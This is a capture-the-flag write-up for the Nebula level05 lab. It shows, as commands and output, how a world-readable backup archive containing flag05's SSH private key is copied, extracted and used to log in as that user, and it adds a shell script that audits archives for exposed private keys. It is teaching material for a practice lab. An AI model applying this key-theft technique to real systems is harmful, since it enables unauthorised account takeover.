We start off with understanding what is being asked of us:
About
Check the flag05 home directory. You are looking for weak directory permissions.
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.
Source code
There is no source code available for this level.
With our information in hand, we log into the box as level05 and move to the /home/flag05 directory:
level05@nebula:~$ cd /home/flag05/
level05@nebula:/home/flag05$ ls -lah
total 5.0K
drwxr-x--- 4 flag05 level05   93 2012-08-18 06:56 .
drwxr-xr-x 1 root   root      60 2012-08-27 07:18 ..
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
-rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05  3.3K 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh
level05@nebula:/home/flag05$
We see a .backup directory that is owned by flag05 and world readable and executable. We dive in and check out its contents:
level05@nebula:/home/flag05/.backup$ ls -lah
total 2.0K
drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
drwxr-x--- 4 flag05 level05   93 2012-08-18 06:56 ..
-rw-rw-r-- 1 flag05 flag05  1.8K 2011-11-20 20:13 backup-19072011.tgz
level05@nebula:/home/flag05/.backup$
We see a backup-19072011.tgz. Interesting. Let's untar it to see what it contains!
level05@nebula:/home/flag05/.backup$ tar -zxvf backup-19072011.tgz
.ssh/
tar: .ssh: Cannot mkdir: Permission denied
.ssh/id_rsa.pub
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/id_rsa.pub: Cannot open: No such file or directory
.ssh/id_rsa
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/id_rsa: Cannot open: No such file or directory
.ssh/authorized_keys
tar: .ssh: Cannot mkdir: Permission denied
tar: .ssh/authorized_keys: Cannot open: No such file or directory
tar: Exiting with failure status due to previous errors
level05@nebula:/home/flag05/.backup$
As suspected, we are unable to extract its contents because we do not have write access to the .backup directory. However, the permission-denied output shows that this backup contains SSH keys!
Our thought here is to copy this backup to a writable directory and extract its contents there. Since these are SSH keys and we are logged in as level05, we'll copy the archive to level05's home directory and untar it, which places the keys in that account's .ssh directory:
level05@nebula:/home/flag05/.backup$ cp backup-19072011.tgz /home/level05/
level05@nebula:/home/flag05/.backup$ cd /home/level05/
level05@nebula:~$ tar -zxvf backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
level05@nebula:~$
Excellent! Let's SSH in as the flag05 user and see if this works:
level05@nebula:~$ ssh flag05@localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.

      _   __     __          __
     / | / /__  / /_  __  __/ /___ _
    /  |/ / _ \/ __ \/ / / / / __ `/
   / /|  /  __/ /_/ / /_/ / / /_/ /
  /_/ |_/\___/_.___/\__,_/_/\__,_/

    exploit-exercises.com/nebula

For level descriptions, please see the above URL.

To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.

Currently there are 20 levels (00 - 19).

Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

flag05@nebula:~$ id
uid=994(flag05) gid=994(flag05) groups=994(flag05)
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
flag05@nebula:~$
Success! This is a classic case where backups can get into the wrong hands. Make sure that a backup is secure and only accessible by the proper users.
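To check a system for the same mistake, the following added example (not part of the original write-up) lists tar archives that any user can read and that contain SSH private key files. The function names, the sample archive name and the fixture contents are constructed for illustration.

```shell
#!/bin/sh
# Added example: find archives readable by "other" that hold SSH private keys.

# Print every tar archive under $1 with the other-read bit set whose member
# list includes a private key name (id_rsa, id_dsa, id_ecdsa, id_ed25519).
# The trailing $ in the pattern excludes the matching .pub files.
audit_backups() {
    find "$1" -type f \( -name '*.tgz' -o -name '*.tar.gz' -o -name '*.tar' \) \
        -perm -004 2>/dev/null |
    while IFS= read -r archive; do
        if tar -tf "$archive" 2>/dev/null |
           grep -Eq '(^|/)id_(rsa|dsa|ecdsa|ed25519)$'; then
            printf '%s\n' "$archive"
        fi
    done
}

# Constructed fixture mirroring the level: a directory with a .backup/
# archive that contains .ssh/id_rsa. $2 is the mode to give the archive.
make_fixture() {
    mkdir -p "$1/.ssh" "$1/.backup"
    printf 'constructed placeholder, not a real key\n' > "$1/.ssh/id_rsa"
    printf 'constructed placeholder\n' > "$1/.ssh/id_rsa.pub"
    tar -czf "$1/.backup/backup-sample.tgz" -C "$1" .ssh
    chmod "$2" "$1/.backup/backup-sample.tgz"
}

demo() {
    tmp=$(mktemp -d)
    make_fixture "$tmp" 664                      # same mode as in the level
    echo "mode 664 flagged: $(audit_backups "$tmp")"
    chmod 600 "$tmp/.backup/backup-sample.tgz"   # owner-only, as a fix
    echo "mode 600 flagged: $(audit_backups "$tmp")"
    rm -rf "$tmp"
}
demo
```

Run `audit_backups /home` as root so every home directory can be traversed. The check looks only at the archive's own mode, so directory permissions such as the world-accessible .backup directory seen above still need a separate review.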
Thanks for reading!
-geoda